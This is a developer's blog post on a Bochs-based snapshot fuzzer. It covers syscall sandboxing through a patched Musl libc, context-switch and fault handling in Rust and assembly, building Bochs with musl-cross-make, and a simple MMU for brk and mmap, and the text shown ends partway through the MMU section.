Reading view

There are new articles available, click to refresh the page.

Fuzzer Development 3: Building Bochs, MMU, and File I/0

5 March 2024 at 05:00

Background

This is the next installment in a series of blogposts detailing the development process of a snapshot fuzzer that aims to utilize Bochs as a target execution engine. You can find the fuzzer and code in the Lucid repository

Introduction

We’re continuing today on our journey to develop our fuzzer. Last time we left off, we had developed the beginnings of a context-switching infrastructure so that we could sandbox Bochs (really a test program) from touching the OS kernel during syscalls.

In this post, we’re going to go over some changes and advancements we’ve made to the fuzzer and also document some progress related to Bochs itself.

Syscall Infrastructure Update

After putting out the last blogpost, I got some really good feedback and suggestions by Fuzzing discord legend WorksButNotTested, who informed me that we could cut down on a lot of complexity if we scrapped the full context-switching/C-ABI-to-Syscall-ABI-Register-Translation routines all together and simply had Bochs call a Rust function from C for syscalls. This is very intuitive and obvious in hindsight and I’m admittedly a little embarrassed to have overlooked this possibility.

Previously, in our custom Musl code, we would have a C function call like so:

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;
}

This is the function that is called when the program needs to make a syscall with 6 arguments. In the previous blog, we changed this function to be an if/else such that if the program was running under Lucid, we would instead call into Lucid’s context-switch function after shuffling the C ABI registers to Syscall registers like so:

static __inline long __syscall6_original(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8  __asm__("r8")  = a5;
	register long r9  __asm__("r9")  = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2), "d"(a3), "r"(r10),
							"r"(r8), "r"(r9) : "rcx", "r11", "memory");

	return ret;
}

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
    if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
	
    register long ret;
    register long r12 __asm__("r12") = (size_t)(g_lucid_ctx->exit_handler);
    register long r13 __asm__("r13") = (size_t)(&g_lucid_ctx->register_bank);
    register long r14 __asm__("r14") = SYSCALL;
    register long r15 __asm__("r15") = (size_t)(g_lucid_ctx);
    
    __asm__ __volatile__ (
        "mov %1, %%rax\n\t"
	"mov %2, %%rdi\n\t"
	"mov %3, %%rsi\n\t"
	"mov %4, %%rdx\n\t"
	"mov %5, %%r10\n\t"
	"mov %6, %%r8\n\t"
	"mov %7, %%r9\n\t"
        "call *%%r12\n\t"
        "mov %%rax, %0\n\t"
        : "=r" (ret)
        : "r" (n), "r" (a1), "r" (a2), "r" (a3), "r" (a4), "r" (a5), "r" (a6),
		  "r" (r12), "r" (r13), "r" (r14), "r" (r15)
        : "rax", "rcx", "r11", "memory"
    );
	
	return ret;
}

So this was quite involved. I was very fixated on the idea that “Lucid has to be the kernel. And when userland programs execute a syscall, their state is saved and execution is started in the kernel”. This proved to lead me astray since such a complicated routine is not needed for our purposes, we are not actually a kernel, we just want to sandbox away syscalls for one specific program who behaves pretty well. WorksButNotTested instead suggested just calling a Rust function like so:

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	if (g_lucid_syscall)
		return g_lucid_syscall(g_lucid_ctx, n, a1, a2, a3, a4, a5, a6);
	
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;
}

Obviously this is a much simpler solution and we get to avoid scrambling registers/saving state/inline-assembly and the rest of it. To set this function up, we just simply created a new function pointer global variable in lucid.h in Musl and gave it a definition in src/lucid.c which can you see in the Musl patches in the repo. g_lucid_syscall looks like this on the Rust side:

pub extern "C" fn lucid_syscall(contextp: *mut LucidContext, n: usize,
    a1: usize, a2: usize, a3: usize, a4: usize, a5: usize, a6: usize)
    -> u64

We get to use the C ABI to our advantage and maintain the semantics of how a program would normally use Musl, and it’s just a very much appreciated suggestion and I couldn’t be happier with how it turned out.

Calling Convention Changes

During this refactoring for syscalls, I also simplified the way our context-switching calling convention would work. Instead of using 4 separate registers for the calling convention, I decided it was doable by just passing a pointer to the Lucid execution context and having the context_switch function itself work out how it should behave based on the context’s values. In essence, we’re moving complexity from the caller-side to the callee-side. This means that the complexity doesn’t keep recurring throughout the codebase, it is encapsulated one time, in the context_switch logic itself. This does require some hacky/brittle code however, for instance we have to hardcode some struct offsets for the Lucid execution data structure, but that is a small price to pay in my opinion for drastically reduced complexity. The context_switch code has been changed to the following

extern "C" { fn context_switch(); }
global_asm!(
    ".global context_switch",
    "context_switch:",

    // Save the CPU flags before we do any operations
    "pushfq",

    // Save registers we use for scratch
    "push r14",
    "push r13",

    // Determine what execution mode we're in
    "mov r14, r15",
    "add r14, 0x8",     // mode is at offset 0x8 from base
    "mov r14, [r14]",
    "cmp r14d, 0x0",
    "je save_bochs",

    // We're in Lucid mode so save Lucid GPRs
    "save_lucid: ",
    "mov r14, r15",
    "add r14, 0x10",    // lucid_regs is at offset 0x10 from base
    "jmp save_gprs",             

    // We're in Bochs mode so save Bochs GPRs
    "save_bochs: ",
    "mov r14, r15",
    "add r14, 0x90",    // bochs_regs is at offset 0x90 from base
    "jmp save_gprs",

You can see that once we hit the context_switch function we save the CPU flags before we do anything that would affect them, then we save a couple of registers that we use as scratch registers. Then we’re free to check the value of context->mode in order to determine what mode of execution we’re in. Based on that value, we are able to know what register bank to use to save our general-purpose registers. So yes, we do have to hardcode some offsets, but I believe overall this is a much better API and system for context-switching callees and the data-structure itself should be relatively stable at this point and not require massive refactoring.

Introducing Faults

Since the last blog-post, I’ve introduced the concept of Fault which is an error class that is reserved for instances when some sort of error is encountered during either context-switching code or syscall-handling. This error is distinct from our highest-level error LucidErr. Ultimately, these faults are plumbed back up to Lucid when they are encountered so that Lucid can handle them. As of this moment, Lucid calls any Fault fatal.

We are able to plumb these back up to Lucid because before starting Bochs execution we now save Lucid’s state and context-switch into starting Bochs:

#[inline(never)]
pub fn start_bochs(context: &mut LucidContext) {
    // Set the execution mode and the reason why we're exiting the Lucid VM
    context.mode = ExecMode::Lucid;
    context.exit_reason = VmExit::StartBochs;

    // Set up the calling convention and then start Bochs by context switching
    unsafe {
        asm!(
            "push r15", // Callee-saved register we have to preserve
            "mov r15, {0}", // Move context into R15
            "call qword ptr [r15]", // Call context_switch
            "pop r15",  // Restore callee-saved register
            in(reg) context as *mut LucidContext,
        );
    }
}

We make some changes to the execution context, namely marking the execution mode (Lucid-mode) and setting the reason why we’re context-switching (to start Bochs). Then in the inline assembly, we call the function pointer at offset 0 in the execution context structure:

// Execution context that is passed between Lucid and Bochs that tracks
// all of the mutable state information we need to do context-switching
#[repr(C)]
#[derive(Clone)]
pub struct LucidContext {
    pub context_switch: usize,  // Address of context_switch()

So then our Lucid state is saved in the context_switch routine and we are then passed to this logic:

// Handle Lucid context switches here
    if LucidContext::is_lucid_mode(context) {
        match exit_reason {
            // Dispatch to Bochs entry point
            VmExit::StartBochs => {
                jump_to_bochs(context);
            },
            _ => {
                fault!(context, Fault::BadLucidExit);
            }
        }
    }

Finally, we call jump_to_bochs:

// Standalone function to literally jump to Bochs entry and provide the stack
// address to Bochs
fn jump_to_bochs(context: *mut LucidContext) {
    // RDX: we have to clear this register as the ABI specifies that exit
    // hooks are set when rdx is non-null at program start
    //
    // RAX: arbitrarily used as a jump target to the program entry
    //
    // RSP: Rust does not allow you to use 'rsp' explicitly with in(), so we
    // have to manually set it with a `mov`
    //
    // R15: holds a pointer to the execution context, if this value is non-
    // null, then Bochs learns at start time that it is running under Lucid
    //
    // We don't really care about execution order as long as we specify clobbers
    // with out/lateout, that way the compiler doesn't allocate a register we 
    // then immediately clobber
    unsafe {
        asm!(
            "xor rdx, rdx",
            "mov rsp, {0}",
            "mov r15, {1}",
            "jmp rax",
            in(reg) (*context).bochs_rsp,
            in(reg) context,
            in("rax") (*context).bochs_entry,
            lateout("rax") _,   // Clobber (inout so no conflict with in)
            out("rdx") _,       // Clobber
            out("r15") _,       // Clobber
        );
    }
}

Full-blown context-switching like this, allows us to encounter a Fault and then pass that error back to Lucid for handling. In the fault_handler, we set the Fault type in the execution context, and then we attempt to restore execution back to Lucid:

// Where we handle faults that may occur when context-switching from Bochs. We
// just want to make the fault visible to Lucid so we set it in the context,
// then we try to restore Lucid execution from its last-known good state
pub fn fault_handler(contextp: *mut LucidContext, fault: Fault) {
    let context = unsafe { &mut *contextp };
    match fault {
        Fault::Success => context.fault = Fault::Success,
        ...
    }

    // Attempt to restore Lucid execution
    restore_lucid_execution(contextp);
}

// We use this function to restore Lucid execution to its last known good state
// This is just really trying to plumb up a fault to a level that is capable of
// discerning what action to take. Right now, we probably just call it fatal. 
// We don't really deal with double-faults, it doesn't make much sense at the
// moment when a single-fault will likely be fatal already. Maybe later?
fn restore_lucid_execution(contextp: *mut LucidContext) {
    let context = unsafe { &mut *contextp };
    
    // Fault should be set, but change the execution mode now since we're
    // jumping back to Lucid
    context.mode = ExecMode::Lucid;

    // Restore extended state
    let save_area = context.lucid_save_area;
    let save_inst = context.save_inst;
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) };

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        },
        _ => (), // NoSave
    }

    // Next, we need to restore our GPRs. This is kind of different order than
    // returning from a successful context switch since normally we'd still be
    // using our own stack; however right now, we still have Bochs' stack, so
    // we need to recover our own Lucid stack which is saved as RSP in our 
    // register bank
    let lucid_regsp = &context.lucid_regs as *const _;

    // Move that pointer into R14 and restore our GPRs. After that we have the
    // RSP value that we saved when we called into context_switch, this RSP was
    // then subtracted from by 0x8 for the pushfq operation that comes right
    // after. So in order to recover our CPU flags, we need to manually sub
    // 0x8 from the stack pointer. Pop the CPU flags back into place, and then 
    // return to the last known good Lucid state
    unsafe {
        asm!(
            "mov r14, {0}",
            "mov rax, [r14 + 0x0]",
            "mov rbx, [r14 + 0x8]",
            "mov rcx, [r14 + 0x10]",
            "mov rdx, [r14 + 0x18]",
            "mov rsi, [r14 + 0x20]",
            "mov rdi, [r14 + 0x28]",
            "mov rbp, [r14 + 0x30]",
            "mov rsp, [r14 + 0x38]",
            "mov r8, [r14 + 0x40]",
            "mov r9, [r14 + 0x48]",
            "mov r10, [r14 + 0x50]",
            "mov r11, [r14 + 0x58]",
            "mov r12, [r14 + 0x60]",
            "mov r13, [r14 + 0x68]",
            "mov r15, [r14 + 0x78]",
            "mov r14, [r14 + 0x70]",
            "sub rsp, 0x8",
            "popfq",
            "ret",
            in(reg) lucid_regsp,
        );
    }
}

As you can see, restoring Lucid state and resuming execution is quite involved, One tricky thing we had to deal with was the fact that right now, when a Fault occurs, we are likely operating in Bochs mode which means that our stack is Bochs’ stack and not Lucid’s. So even though this is technically just a context-switch, we had to change the order around a little bit to pop Lucid’s saved state into our current state and resume execution. Now when Lucid calls functions that context-switch, it can simply check the “return” value of such functions by checking if there was a Fault noted in the execution context like so:

	// Start executing Bochs
    prompt!("Starting Bochs...");
    start_bochs(&mut lucid_context);

    // Check to see if any faults occurred during Bochs execution
    if !matches!(lucid_context.fault, Fault::Success) {
        fatal!(LucidErr::from_fault(lucid_context.fault));
    }

Pretty neat imo!

Sandboxing Thread-Local-Storage

Coming into this project, I honestly didn’t know much about thread-local-storage (TLS) except that it was some magic per-thread area of memory that did stuff. That is still the entirety of my knowledge really, except now I’ve seen some code that allocates that memory and initializes it, which helps me appreciate what is really going on. Once I implemented the Fault system discussed above, I noticed that Lucid would segfault when exiting. After some debugging, I realized it was calling a function pointer that was a bogus address. How could this have happened? Well, after some digging, I noticed that right before that function call, an offset of the fs register was used to load the address from memory. Typically, fs is used to access TLS. So at that point, I had a strong suspicion that Bochs had somehow corrupted the value of my fs register. So I did a quick grep through Musl looking for fs register access and found the following:

/* Copyright 2011-2012 Nicholas J. Kain, licensed under standard MIT license */
.text
.global __set_thread_area
.hidden __set_thread_area
.type __set_thread_area,@function
__set_thread_area:
	mov %rdi,%rsi           /* shift for syscall */
	movl $0x1002,%edi       /* SET_FS register */
	movl $158,%eax          /* set fs segment to */
	syscall                 /* arch_prctl(SET_FS, arg)*/
	ret

So this function, __set_thread_area uses an inline syscall instruction to call arch_prctl to directly manipulate the fs register. This made a lot of sense because, if the syscall instruction was indeed called, we wouldn’t intercept this with our syscall sandboxing infrastructure because we never instrumented this, we’ve only instrumented what boils down to the syscall() function wrapper in Musl. So this would escape our sandbox and directly manipulate fs. Sure enough, I discovered that this function is called during TLS initialization in src/env/__init_tls.c:

int __init_tp(void *p)
{
	pthread_t td = p;
	td->self = td;
	int r = __set_thread_area(TP_ADJ(p));
	if (r < 0) return -1;
	if (!r) libc.can_do_threads = 1;
	td->detach_state = DT_JOINABLE;
	td->tid = __syscall(SYS_set_tid_address, &__thread_list_lock);
	td->locale = &libc.global_locale;
	td->robust_list.head = &td->robust_list.head;
	td->sysinfo = __sysinfo;
	td->next = td->prev = td;
	return 0;
}

So in this __init_tp function, we’re given a pointer and then we call TP_ADJ macro to do some arithmetic on the pointer and pass that value to __set_thread_area so that fs is manipulated. Great, now how do we sandbox this? I wanted to avoid messing with the inline assembly in __set_thread_area itself, so I just changed the source so that Musl would instead just utilize the syscall() wrapper function which calls our instrumented syscall functions under the hood, like so:

#ifndef ARCH_SET_FS
#define ARCH_SET_FS 0x1002
#endif /* ARCH_SET_FS */

int __init_tp(void *p)
{
	pthread_t td = p;
	td->self = td;
	int r = syscall(SYS_arch_prctl, ARCH_SET_FS, TP_ADJ(p));
	//int r = __set_thread_area(TP_ADJ(p));

Now, we can intercept this syscall in Lucid and effectively do nothing really. As long as there are not other direct accesses to fs (and there might be still!), we should be fine here. I also adjusted the Musl code so that if we’re running under Lucid, we provide a TLS-area via the execution context by just creating a mock area of what Musl calls the builtin_tls:

static struct builtin_tls {
	char c;
	struct pthread pt;
	void *space[16];
} builtin_tls[1];

So now, when __init_tp is called, the pointer it is giving points to our own TLS block of memory we’ve created in the execution context so that we now have access to things like errno in Lucid:

if (libc.tls_size > sizeof builtin_tls) {
#ifndef SYS_mmap2
#define SYS_mmap2 SYS_mmap
#endif
		__asm__ __volatile__ ("int3"); // Added by me just in case
		mem = (void *)__syscall(
			SYS_mmap2,
			0, libc.tls_size, PROT_READ|PROT_WRITE,
			MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
		/* -4095...-1 cast to void * will crash on dereference anyway,
		 * so don't bloat the init code checking for error codes and
		 * explicitly calling a_crash(). */
	} else {
		// Check to see if we're running under Lucid or not
		if (!g_lucid_ctx) { mem = builtin_tls; }
		else { mem = &g_lucid_ctx->tls; }
	}

	/* Failure to initialize thread pointer is always fatal. */
	if (__init_tp(__copy_tls(mem)) < 0)
		a_crash();

#[repr(C)]
#[derive(Clone)]
pub struct Tls {
    padding0: [u8; 8], // char c
    padding1: [u8; 52], // Padding to offset of errno which is 52-bytes
    pub errno: i32,
    padding2: [u8; 144], // Additional padding to get to 200-bytes total
    padding3: [u8; 128], // 16 void * values
}

So now for example, if during a read syscall, we get passed a NULL buffer, we can return an error code and set errno appropriately from the syscall handler in Lucid:

            // Now we need to make sure the buffer passed to read isn't NULL
            let buf_p = a2 as *mut u8;
            if buf_p.is_null() {
                context.tls.errno = libc::EINVAL;
                return -1_i64 as u64;
            }

There may still be other accesses to fs and gs that I’m not currently sandboxing, but we haven’t reached that part of development yet.

Building Bochs

I put off building and loading Bochs for a long time because I wanted to make sure I had the foundations of context-switching and syscall-sandboxing built. I also was worried that it would be difficult since getting vanilla Bochs built --static-pie was difficult for me initially. To complicate building Bochs in general, we need to build Bochs against our custom Musl. This means that we’ll need to have a compiler that we can tell to ignore whatever standard C library it normally uses and use our custom Musl libc instead. This proved quite tedious and difficult for me. Once I was successful, I came to realize that wasn’t enough. Bochs, being a C++ code base, also required access to standard C++ library functions. This simply could not work as I had done previously with the test program because I didn’t have a C++ library that we could use that had been built against our custom Musl.

Luckily, there is an awesome project called the musl-cross-make project, which aims to help people build their own Musl toolchains from scratch. This is perfect for what we need because we require a complete toolchain. We need to support the C++ standard library and it needs to be built with our custom Musl. So to do this, we use the The GNU C++ Library, libstdc++, that is part of the gcc project.

musl-cross-make will pull down all of constituent tool-chain components and create a from scratch tool chain that will utilize a Musl libc and a libstdc++ built against that Musl. Then all we have to do for our purposes, is recompile that Musl libc with our custom patches that we make with Lucid, and then use the tool chain to compile Bochs as --static-pie. It really was as simple as:

git clone musl-cross-make
configure an x86_64 tool chain target
build the tool chain
go into its Musl directory, apply our Musl patches
configure Musl to build/install into the musl-cross-make output directory
re-build Musl libc
configure Bochs to use the new toolchain and set the --static-pie flag

This is the Bochs configuration file that I used to build Bochs:

#!/bin/sh

CC="/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-gcc"
CXX="/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-g++"
CFLAGS="-Wall --static-pie -fPIE"
CXXFLAGS="$CFLAGS"

export CC
export CXX
export CFLAGS
export CXXFLAGS

./configure --enable-sb16 \
                --enable-all-optimizations \
                --enable-long-phy-address \
                --enable-a20-pin \
                --enable-cpu-level=6 \
                --enable-x86-64 \
                --enable-vmx=2 \
                --enable-pci \
                --enable-usb \
                --enable-usb-ohci \
                --enable-usb-ehci \
                --enable-usb-xhci \
                --enable-busmouse \
                --enable-e1000 \
                --enable-show-ips \
                --enable-avx \
                --with-nogui

This was enough to get the Bochs binary I wanted to begin testing with. In the future we will likely need to change this configuration file, but for now this works. The repository should have more detailed build instructions and also will include already built Bochs binary.

Implementing a Simple MMU

Now that we are loading and executing Bochs and sandboxing it from syscalls, there are several new syscalls that we need to implement such as brk, mmap, and munmap. Our test program was very simple and we hadn’t come across these syscalls yet.

These three syscalls all manipulate memory in some way, so I decided that we needed to implement some sort of Memory-Manager (MMU). To keep things as simple as possible, I decided that, at least for now, we will not be worrying about freeing memory, re-using memory, or unmapping memory. We will simply pre-allocate a pool of memory for both brk calls to use and mmap calls to use, so two pre-allocated pools of memory. We can also just hang the MMU structure off of the execution context so that we always have access to it during syscalls and context-switches.

So far, Bochs really only cares to map memory in that is READ/WRITE, so that works in our favor in terms of simplicity. So to pre-allocate the memory pools, we just do a fairly large mmap call ourselves when we set up the MMU as part of the execution context initialization routine:

// Structure to track memory usage in Bochs
#[derive(Clone)]
pub struct Mmu {
    pub brk_base: usize,        // Base address of brk region, never changes
    pub brk_size: usize,        // Size of the program break region
    pub curr_brk: usize,        // The current program break
    
    pub mmap_base: usize,       // Base address of the `mmap` pool
    pub mmap_size: usize,       // Size of the `mmap` pool
    pub curr_mmap: usize,       // The current `mmap` page base
    pub next_mmap: usize,       // The next allocation base address
}

impl Mmu {
    pub fn new() -> Result<Self, LucidErr> {
        // We don't care where it's mapped
        let addr = std::ptr::null_mut::<libc::c_void>();

        // Straight-forward
        let length = (DEFAULT_BRK_SIZE + DEFAULT_MMAP_SIZE) as libc::size_t;

        // This is normal
        let prot = libc::PROT_WRITE | libc::PROT_READ;

        // This might change at some point?
        let flags = libc::MAP_ANONYMOUS | libc::MAP_PRIVATE;

        // No file backing
        let fd = -1 as libc::c_int;

        // No offset
        let offset = 0 as libc::off_t;

        // Try to `mmap` this block
        let result = unsafe {
            libc::mmap(
                addr,
                length,
                prot,
                flags,
                fd,
                offset
            )
        };

        if result == libc::MAP_FAILED {
            return Err(LucidErr::from("Failed `mmap` memory for MMU"));
        }

        // Create MMU
        Ok(Mmu {
            brk_base: result as usize,
            brk_size: DEFAULT_BRK_SIZE,
            curr_brk: result as usize,
            mmap_base: result as usize + DEFAULT_BRK_SIZE,
            mmap_size: DEFAULT_MMAP_SIZE,
            curr_mmap: result as usize + DEFAULT_BRK_SIZE,
            next_mmap: result as usize + DEFAULT_BRK_SIZE,
        })
    }

Handling memory-management syscalls actually wasn’t too difficult, there were some gotcha’s early on but we managed to get something working fairly quickly.

Handling `brk`

brk is a syscall used to increase the size of the data segment in your program. So a typical pattern you’ll see is that the program will call brk(0), which will return the current program break address, and then if the program wants 2 pages of extra memory, it will then call brk(base + 0x2000), and you can see that in the Bochs strace output:

[devbox:~/bochs/bochs-2.7]$ strace ./bochs
execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0)         = 289704
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000

So in our syscall handler, I have the following logic for brk:

// brk
        0xC => {
            // Try to update the program break
            if context.mmu.update_brk(a1).is_err() {
                fault!(contextp, Fault::InvalidBrk);
            }

            // Return the program break
            context.mmu.curr_brk as u64
        },

This is effectively a wrapper around the update_brk method we’ve implemented for Mmu, so let’s look at that:

// Logic for handling a `brk` syscall
    pub fn update_brk(&mut self, addr: usize) -> Result<(), ()> {
        // If addr is NULL, just return nothing to do
        if addr == 0 { return Ok(()); }

        // Check to see that the new address is in a valid range
        let limit = self.brk_base + self.brk_size;
        if !(self.curr_brk..limit).contains(&addr) { return Err(()); }

        // So we have a valid program break address, update the current break
        self.curr_brk = addr;

        Ok(())
    }

So if we get a NULL argument in a1, we have nothing to do, nothing in the current MMU state needs adjusting, we just simply return the current program break. If we get a non-NULL argument, we do a sanity check to make sure that our pool of brk memory is large enough to accomodate the request and if it is, we adjust the current program break and return that to the caller.

Remember, this is so simple because we’ve already pre-allocated all of the memory, so we don’t need to actually do much here besides adjust what amounts to an offset indicating what memory is valid.

Handling `mmap` and `munmap`

mmap is a bit more involved, but still easy to track through. For mmap calls, theres more state we need to track because there are essentially “allocations” taking place that we need to keep in mind. Most mmap calls will have a NULL argument for address because they don’t care where the memory mapping takes place in virtual memory, in that case, we default to our main method do_mmap that we’ve implemented for Mmu:

// If a1 is NULL, we just do a normal mmap
            if a1 == 0 {
                if context.mmu.do_mmap(a2, a3, a4, a5, a6).is_err() {
                    fault!(contextp, Fault::InvalidMmap);
                }

                // Succesful regular mmap
                return context.mmu.curr_mmap as u64;
            }

// Logic for handling a `mmap` syscall with no fixed address support
    pub fn do_mmap(
        &mut self,
        len: usize,
        prot: usize,
        flags: usize,
        fd: usize,
        offset: usize
    ) -> Result<(), ()> {
        // Page-align the len
        let len = (len + PAGE_SIZE - 1) & !(PAGE_SIZE - 1);

        // Make sure we have capacity left to satisfy this request
        if len + self.next_mmap > self.mmap_base + self.mmap_size { 
            return Err(());
        }

        // Sanity-check that we don't have any weird `mmap` arguments
        if prot as i32 != libc::PROT_READ | libc::PROT_WRITE {
            return Err(())
        }

        if flags as i32 != libc::MAP_PRIVATE | libc::MAP_ANONYMOUS {
            return Err(())
        }

        if fd as i64 != -1 {
            return Err(())
        }

        if offset != 0 {
            return Err(())
        }

        // Set current to next, and set next to current + len
        self.curr_mmap = self.next_mmap;
        self.next_mmap = self.curr_mmap + len;

        // curr_mmap now represents the base of the new requested allocation
        Ok(())
    }

Very simply, we do some sanity checks to make sure we have enough capacity to satisfy the allocation in our mmap memory pool, we check to make sure the other arguments are what we’re anticipating, and then we simply update the current offset and the next offset. This way we know next time where to allocate from while also being able to return the current allocation base back to the caller.

There is also a case where mmap will be called with a non-NULL address and MAP_FIXED flags meaning that the address matters to the caller and the mapping should take place at the provided virtual address. Right now, this occurs early on in the Bochs process:

[devbox:~/bochs/bochs-2.7]$ strace ./bochs
execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0)         = 289704
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000

For this special case, there is really nothing for us to do since that address is in the brk pool. We already know about that memory, we’ve already created it, so this last mmap call you see above amounts to a NOP for us, there is nothing to do but return the address back to the caller.

At this time, we don’t support MAP_FIXED calls for non-brk pool memory.

For munmap, we also treat this operation as a NOP and return success to the user because we’re not concerned with freeing or re-using memory at this time.

You can see that Bochs does quite a bit of brk and mmap calls and our fuzzer is now capable of handling them all via our MMU:

...
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bde000
mmap(NULL, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bda000
mmap(NULL, 4194324, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd06f7ff000
mmap(NULL, 73728, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbe000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbd000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbc000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
munmap(0x7fd071bbb000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bba000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb9000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb8000
brk(0x555555d7f000)                     = 0x555555d7f000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
munmap(0x7fd071bb5000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb0000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baf000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096)            = 0
